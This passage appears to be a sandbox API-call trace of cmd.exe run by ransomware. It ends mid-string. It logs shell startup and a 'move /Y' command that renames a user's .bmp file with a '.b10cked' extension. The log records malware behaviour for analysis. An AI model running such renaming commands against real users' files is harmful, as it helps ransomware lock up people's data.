[0225.164] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afdfc, dwLength=0x1c | out: lpBuffer=0x2afdfc*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0225.164] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afdfc, dwLength=0x1c | out: lpBuffer=0x2afdfc*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0225.164] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afdfc, dwLength=0x1c | out: lpBuffer=0x2afdfc*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.164] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afdfc, dwLength=0x1c | out: lpBuffer=0x2afdfc*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0225.164] GetConsoleOutputCP () returned 0x1b5 [0225.165] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.165] SetConsoleCtrlHandler (HandlerRoutine=0x49e1e72a, Add=1) returned 1 [0225.165] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.165] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0225.165] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.165] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0225.165] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.165] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.165] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.165] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0225.166] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.166] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0225.166] GetEnvironmentStringsW () returned 0x60198* [0225.166] FreeEnvironmentStringsW (penv=0x60198) returned 1 [0225.166] GetEnvironmentStringsW () returned 0x60198* [0225.166] FreeEnvironmentStringsW (penv=0x60198) returned 1 [0225.166] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aed9c | out: phkResult=0x2aed9c*=0x40) returned 0x0 [0225.166] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aeda4, lpData=0x2aeda8, lpcbData=0x2aeda0*=0x1000 | out: lpType=0x2aeda4*=0x0, lpData=0x2aeda8*=0xc0, lpcbData=0x2aeda0*=0x1000) returned 0x2 [0225.166] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aeda4, lpData=0x2aeda8, lpcbData=0x2aeda0*=0x1000 | out: lpType=0x2aeda4*=0x4, lpData=0x2aeda8*=0x1, lpcbData=0x2aeda0*=0x4) returned 0x0 [0225.166] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aeda4, lpData=0x2aeda8, lpcbData=0x2aeda0*=0x1000 | out: lpType=0x2aeda4*=0x0, lpData=0x2aeda8*=0x1, lpcbData=0x2aeda0*=0x1000) returned 0x2 [0225.167] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aeda4, lpData=0x2aeda8, lpcbData=0x2aeda0*=0x1000 | out: lpType=0x2aeda4*=0x4, lpData=0x2aeda8*=0x0, lpcbData=0x2aeda0*=0x4) returned 0x0 [0225.167] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aeda4, lpData=0x2aeda8, lpcbData=0x2aeda0*=0x1000 | out: lpType=0x2aeda4*=0x4, lpData=0x2aeda8*=0x40, lpcbData=0x2aeda0*=0x4) returned 0x0 [0225.167] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aeda4, lpData=0x2aeda8, lpcbData=0x2aeda0*=0x1000 | out: lpType=0x2aeda4*=0x4, lpData=0x2aeda8*=0x40, lpcbData=0x2aeda0*=0x4) returned 0x0 [0225.167] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aeda4, lpData=0x2aeda8, lpcbData=0x2aeda0*=0x1000 | out: lpType=0x2aeda4*=0x0, lpData=0x2aeda8*=0x40, lpcbData=0x2aeda0*=0x1000) returned 0x2 [0225.167] RegCloseKey (hKey=0x40) returned 0x0 [0225.167] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aed9c | out: phkResult=0x2aed9c*=0x40) returned 0x0 [0225.167] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aeda4, lpData=0x2aeda8, lpcbData=0x2aeda0*=0x1000 | out: lpType=0x2aeda4*=0x0, lpData=0x2aeda8*=0x40, lpcbData=0x2aeda0*=0x1000) returned 0x2 [0225.167] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aeda4, lpData=0x2aeda8, lpcbData=0x2aeda0*=0x1000 | out: lpType=0x2aeda4*=0x4, lpData=0x2aeda8*=0x1, lpcbData=0x2aeda0*=0x4) returned 0x0 [0225.167] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aeda4, lpData=0x2aeda8, lpcbData=0x2aeda0*=0x1000 | out: lpType=0x2aeda4*=0x0, lpData=0x2aeda8*=0x1, lpcbData=0x2aeda0*=0x1000) returned 0x2 [0225.167] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aeda4, lpData=0x2aeda8, lpcbData=0x2aeda0*=0x1000 | out: lpType=0x2aeda4*=0x4, lpData=0x2aeda8*=0x0, lpcbData=0x2aeda0*=0x4) returned 0x0 [0225.167] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aeda4, lpData=0x2aeda8, lpcbData=0x2aeda0*=0x1000 | out: lpType=0x2aeda4*=0x4, lpData=0x2aeda8*=0x9, lpcbData=0x2aeda0*=0x4) returned 0x0 [0225.167] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aeda4, lpData=0x2aeda8, lpcbData=0x2aeda0*=0x1000 | out: lpType=0x2aeda4*=0x4, lpData=0x2aeda8*=0x9, lpcbData=0x2aeda0*=0x4) returned 0x0 [0225.167] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aeda4, lpData=0x2aeda8, lpcbData=0x2aeda0*=0x1000 | out: lpType=0x2aeda4*=0x0, lpData=0x2aeda8*=0x9, lpcbData=0x2aeda0*=0x1000) returned 0x2 [0225.167] RegCloseKey (hKey=0x40) returned 0x0 [0225.167] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b9 [0225.167] srand (_Seed=0x5b8863b9) [0225.167] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp.b10cked\"" [0225.167] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp.b10cked\"" [0225.168] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.168] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x618f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0225.168] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0225.168] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0225.168] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.168] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0225.168] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0225.168] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0225.168] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0225.168] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0225.168] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0225.169] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0225.169] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0225.169] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0225.169] GetEnvironmentStringsW () returned 0x622e8* [0225.169] FreeEnvironmentStringsW (penv=0x622e8) returned 1 [0225.169] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.169] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.169] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0225.169] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0225.169] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0225.169] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0225.169] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0225.169] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0225.169] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0225.169] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0225.169] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2afb68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.169] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2afb68, lpFilePart=0x2afb64 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2afb64*="Desktop") returned 0x18 [0225.169] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.170] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af8e4 | out: lpFindFileData=0x2af8e4) returned 0x60028 [0225.170] FindClose (in: hFindFile=0x60028 | out: hFindFile=0x60028) returned 1 [0225.170] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af8e4 | out: lpFindFileData=0x2af8e4) returned 0x60028 [0225.170] FindClose (in: hFindFile=0x60028 | out: hFindFile=0x60028) returned 1 [0225.170] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af8e4 | out: lpFindFileData=0x2af8e4) returned 0x60028 [0225.170] FindClose (in: hFindFile=0x60028 | out: hFindFile=0x60028) returned 1 [0225.170] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.170] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0225.170] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0225.171] GetEnvironmentStringsW () returned 0x62b08* [0225.171] FreeEnvironmentStringsW (penv=0x62b08) returned 1 [0225.171] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.171] GetConsoleOutputCP () returned 0x1b5 [0225.171] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.171] GetUserDefaultLCID () returned 0x409 [0225.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e24950, cchData=8 | out: lpLCData=":") returned 2 [0225.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2afca8, cchData=128 | out: lpLCData="0") returned 2 [0225.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2afca8, cchData=128 | out: lpLCData="0") returned 2 [0225.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2afca8, cchData=128 | out: lpLCData="1") returned 2 [0225.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e24940, cchData=8 | out: lpLCData="/") returned 2 [0225.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e24d80, cchData=32 | out: lpLCData="Mon") returned 4 [0225.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e24d40, cchData=32 | out: lpLCData="Tue") returned 4 [0225.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e24d00, cchData=32 | out: lpLCData="Wed") returned 4 [0225.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e24cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0225.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e24c80, cchData=32 | out: lpLCData="Fri") returned 4 [0225.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e24c40, cchData=32 | out: lpLCData="Sat") returned 4 [0225.172] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e24c00, cchData=32 | out: lpLCData="Sun") returned 4 [0225.173] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e24930, cchData=8 | out: lpLCData=".") returned 2 [0225.173] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e24920, cchData=8 | out: lpLCData=",") returned 2 [0225.173] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0225.173] GetConsoleTitleW (in: lpConsoleTitle=0x508f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.174] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.174] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0225.174] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0225.174] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0225.174] _wcsicmp (_String1="move", _String2=")") returned 68 [0225.174] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0225.175] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0225.175] _wcsicmp (_String1="IF", _String2="move") returned -4 [0225.175] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0225.175] _wcsicmp (_String1="REM", _String2="move") returned 5 [0225.175] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0225.178] GetConsoleTitleW (in: lpConsoleTitle=0x2af9a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.179] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0225.179] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0225.179] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0225.179] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0225.179] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0225.179] _wcsicmp (_String1="move", _String2="CD") returned 10 [0225.179] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0225.179] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0225.179] _wcsicmp (_String1="move", _String2="REN") returned -5 [0225.179] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0225.179] _wcsicmp (_String1="move", _String2="SET") returned -6 [0225.179] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0225.179] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0225.179] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0225.179] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0225.179] _wcsicmp (_String1="move", _String2="MD") returned 11 [0225.179] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0225.179] _wcsicmp (_String1="move", _String2="RD") returned -5 [0225.179] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0225.179] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0225.179] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0225.179] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0225.179] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0225.179] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0225.179] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0225.179] _wcsicmp (_String1="move", _String2="VER") returned -9 [0225.179] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0225.180] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0225.180] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0225.180] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0225.180] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0225.180] _wcsicmp (_String1="move", _String2="START") returned -6 [0225.180] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0225.180] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0225.180] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0225.182] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0225.182] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0225.182] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2af75c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2af754, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2af754*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0225.182] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0225.182] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0225.182] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0225.182] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0225.182] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0225.182] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0225.182] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0225.183] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0225.184] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0225.184] _wcsicmp (_String1="65OAv.bmp", _String2=".") returned 8 [0225.184] _wcsicmp (_String1="65OAv.bmp", _String2="..") returned 8 [0225.184] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\65oav.bmp")) returned 0x20 [0225.184] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x61e68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.184] SetErrorMode (uMode=0x0) returned 0x0 [0225.184] SetErrorMode (uMode=0x1) returned 0x0 [0225.184] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp", nBufferLength=0x104, lpBuffer=0x2af0e4, lpFilePart=0x2af0cc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp", lpFilePart=0x2af0cc*="65OAv.bmp") returned 0x30 [0225.184] SetErrorMode (uMode=0x0) returned 0x1 [0225.185] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1")) returned 0x12 [0225.185] _wcsicmp (_String1="65OAv.bmp", _String2=".") returned 8 [0225.185] _wcsicmp (_String1="65OAv.bmp", _String2="..") returned 8 [0225.185] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\65oav.bmp")) returned 0x20 [0225.185] SetErrorMode (uMode=0x0) returned 0x0 [0225.185] SetErrorMode (uMode=0x1) returned 0x0 [0225.185] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp", nBufferLength=0x104, lpBuffer=0x2af560, lpFilePart=0x2af2f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp", lpFilePart=0x2af2f8*="65OAv.bmp") returned 0x30 [0225.185] SetErrorMode (uMode=0x0) returned 0x1 [0225.185] SetErrorMode (uMode=0x0) returned 0x0 [0225.185] SetErrorMode (uMode=0x1) returned 0x0 [0225.185] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x2af768, lpFilePart=0x2af2f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp.b10cked", lpFilePart=0x2af2f8*="65OAv.bmp.b10cked") returned 0x38 [0225.185] SetErrorMode (uMode=0x0) returned 0x1 [0225.185] SetLastError (dwErrCode=0x0) [0225.186] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\65oav.bmp.b10cked")) returned 0xffffffff [0225.186] GetLastError () returned 0x2 [0225.186] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp", fInfoLevelId=0x1, lpFindFileData=0x2aec74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aec74) returned 0x50eb0 [0225.186] FindNextFileW (in: hFindFile=0x50eb0, lpFindFileData=0x2aec74 | out: lpFindFileData=0x2aec74) returned 0 [0225.186] GetLastError () returned 0x12 [0225.187] FindClose (in: hFindFile=0x50eb0 | out: hFindFile=0x50eb0) returned 1 [0225.188] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp", fInfoLevelId=0x1, lpFindFileData=0x61c08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x61c08) returned 0x50eb0 [0225.188] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x2aef0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp.b10cked", lpFilePart=0x0) returned 0x38 [0225.188] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp", nBufferLength=0x104, lpBuffer=0x2aef0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp", lpFilePart=0x0) returned 0x30 [0225.188] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\65oav.bmp")) returned 0x20 [0225.188] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\65oav.bmp"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\65OAv.bmp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\65oav.bmp.b10cked"), dwFlags=0x3) returned 1 [0225.189] FindClose (in: hFindFile=0x50eb0 | out: hFindFile=0x50eb0) returned 1 [0225.189] _vsnwprintf (in: _Buffer=0x49e25040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2aeec0 | out: _Buffer=" 1") returned 9 [0225.189] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.189] GetFileType (hFile=0x7) returned 0x2 [0225.403] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0225.403] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2aee4c | out: lpMode=0x2aee4c) returned 1 [0225.403] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.403] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2aee80 | out: lpConsoleScreenBufferInfo=0x2aee80) returned 1 [0225.404] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49e34640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) 